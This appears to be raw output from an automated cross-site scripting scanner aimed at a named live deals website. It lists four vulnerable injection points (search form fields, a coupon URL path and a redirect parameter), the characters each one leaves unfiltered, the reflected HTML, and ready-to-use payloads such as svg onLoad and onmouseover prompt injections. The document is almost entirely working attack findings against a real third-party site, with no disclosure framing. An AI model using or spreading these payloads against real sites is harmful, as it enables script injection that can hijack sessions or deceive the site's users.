Untitled


URL: https://www.dealsplus.com/tag/wifi-router
response URL: https://www.dealsplus.com/search?keyword=x" onmouseover=prompt(9) "
POST url: https://www.dealsplus.com/search
Unfiltered: '"(){}:/;
Payload: 1zqjgc'"(){}<x>:/1zqjgc;9
Type: form
Injection point: keyword
Possible payloads: x"/onmouseover=prompt(9)/", x" onmouseover=prompt(9) "
Line: <meta name="description" content="find the best deals for 1zqjgc'"(){}:/1zqjgc;9

URL: https://www.dealsplus.com/coupon
response URL: https://www.dealsplus.com/coupon/x"><svG onLoad=prompt(9)>
Unfiltered: '"(){}<x>:;
Payload: 1zqjnn'"(){}<x>:1zqjnn;9
Type: url
Injection point: end of url
Possible payloads: x"/onmouseover=prompt(9)/", x"><svG onLoad=prompt(9)>, x" onmouseover=prompt(9) "
Line: <html data-path="/coupon/1zqjnn'"(){}<x>:1zqjnn;9

URL: https://www.dealsplus.com/go/rd?u1=amazon.com&u2=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB073HP1JVY%2Fref%3Dox_sc_act_title_1%3Fsmid%3DATVPDKIKX0DER&sid=1D3D4zfn8D1D3D1D0D0D0D0&m=ATVPDKIKX0DER
response URL: https://www.dealsplus.com/go/rd?u1=amazon.com&u2=1zqjbh'%22()%7B%7D%3Cx%3E:/1zqjbh;9&sid=1D3D4zfn8D1D3D1D0D0D0D0&m=ATVPDKIKX0DER
Unfiltered: '(){}<x>:/;
Payload: 1zqjbh'"(){}<x>:/1zqjbh;9
Type: url
Injection point: u2
Possible payloads: </SCript><svG/onLoad=prompt(9)>
Line: <script type="text/javascript">
    settimeout(gourl, 2000);

    function gourl() {
        window.location.replace("1zqjbh'%22(){}<x>:/1zqjbh;9

URL: https://www.dealsplus.com/blackfriday/deals/tvs
response URL: https://www.dealsplus.com/blackfriday/search?q=1zqjjv%27%22%28%29%7B%7D%3Cx%3E%3A%2F1zqjjv%3B9
POST url: https://www.dealsplus.com/blackfriday/search
Unfiltered: '(){}<x>:/;
Payload: 1zqjjv'"(){}<x>:/1zqjjv;9
Type: form
Injection point: q
Possible payloads: </SCript><svG/onLoad=prompt(9)>
Line: <script type="text/javascript">
      bfa.logevent("search results viewed", {"query":"1zqjjv'\"(){}<x>:/1zqjjv;9